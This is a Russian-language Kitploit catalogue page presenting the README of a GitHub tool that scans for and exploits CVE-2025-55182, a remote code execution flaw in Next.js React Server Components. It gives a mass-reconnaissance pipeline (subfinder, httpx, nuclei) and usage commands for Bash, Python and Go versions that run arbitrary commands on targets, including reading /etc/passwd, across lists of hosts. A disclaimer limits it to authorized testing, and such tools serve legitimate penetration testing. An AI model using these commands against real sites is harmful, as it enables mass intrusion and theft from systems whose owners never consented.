Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-Simple-Scanner — Высокоточный RCE-сканер для CVE-2025-55182, затрагивающей Next.js RSC. Поддерживает массовое сканирование, выполнение команд и автоматизированные пайплайны разведки. Создан для пентестеров, исследователей и охотников за багами. | Kitploit
Инструменты/GitHubGitHub/satriarizka/cve-2025-55182-simple-scanner
РазведкаСканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
satriarizka/cve-2025-55182-simple-scanner

CVE-2025-55182-Simple-Scanner

Высокоточный RCE-сканер для CVE-2025-55182, затрагивающей Next.js RSC. Поддерживает массовое сканирование, выполнение команд и автоматизированные пайплайны разведки. Создан для пентестеров, исследователей и охотников за багами.

Репозиторий
8 месяцев назадЕщё не проверено

CVE-2025-55182: Сканер RCE в React Server Components

Комплексный инструментарий для обнаружения и эксплуатации CVE-2025-55182 — критической уязвимости удалённого выполнения кода (Remote Code Execution) в приложениях Next.js, использующих React Server Components.

Репозиторий включает унифицированный Bash-сканер (режимы одиночной и массовой проверки), реализации на Python/Go, а также рабочий процесс разведки для программ bug bounty.

Меню сканера Демонстрация сканера


📂 Структура репозитория

  • scanner.sh — универсальный Bash-скрипт для одиночной и массовой проверки целей
  • python/exploit.py — стабильная реализация на Python (лучшее экранирование JSON)
  • go/main.go — высокопроизводительная реализация (компилируемая)

🚀 Рабочий процесс разведки (методология Bug Bounty)

Для массового поиска по wildcard-доменам используйте этот конвейер для фильтрации целей перед сканированием:

root@kitploit:~
# 1. Перечисление поддоменов
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Фильтрация живых хостов
httpx -l subs.txt -o live.txt

# 3. Предварительное обнаружение с помощью Nuclei (необязательно)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Использование Bash-сканера (рекомендуется)

Скрипт scanner.sh поддерживает сканирование одиночных целей и массовое сканирование из файла со списком.

🔧 Установка

root@kitploit:~
chmod +x scanner.sh

1️⃣ Режим одиночной цели

Лучше всего подходит для проверки конкретной цели с подробным выводом.

root@kitploit:~
# Базовая проверка (по умолчанию выполняется "id")
./scanner.sh -d example.com

# Выполнение произвольной команды
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ Режим массового сканирования

Эффективно сканирует список URL и сохраняет уязвимые хосты в файл.

root@kitploit:~
# Сканирование списка URL
./scanner.sh -l live.txt -c "whoami"

# Собственный файл вывода
./scanner.sh -l live.txt -o my_bounty.txt

Параметры


🐍 Версия на Python

Используйте её, если возникают проблемы с экранированием специальных символов в Bash.

Требования

root@kitploit:~
pip install requests

Использование

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Версия на Go

Высокая производительность, минимум зависимостей.

Запуск напрямую

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

Сборка бинарного файла

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование строго запрещено законом. Разработчик не несёт ответственности за неправомерное использование или ущерб, причинённый данной программой.


🔗 Ссылки

  • Детали CVE на NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • Консультация по безопасности React (уязвимость React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • Шаблон Nuclei от ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182

Скачать инструмент
ФлагОписание
-d, --domainURL одиночной цели
-l, --listФайл со списком URL
-c, --commandКоманда для выполнения (по умолчанию: id)
-o, --outputФайл вывода для уязвимых хостов (по умолчанию: vulnerable_hosts.txt)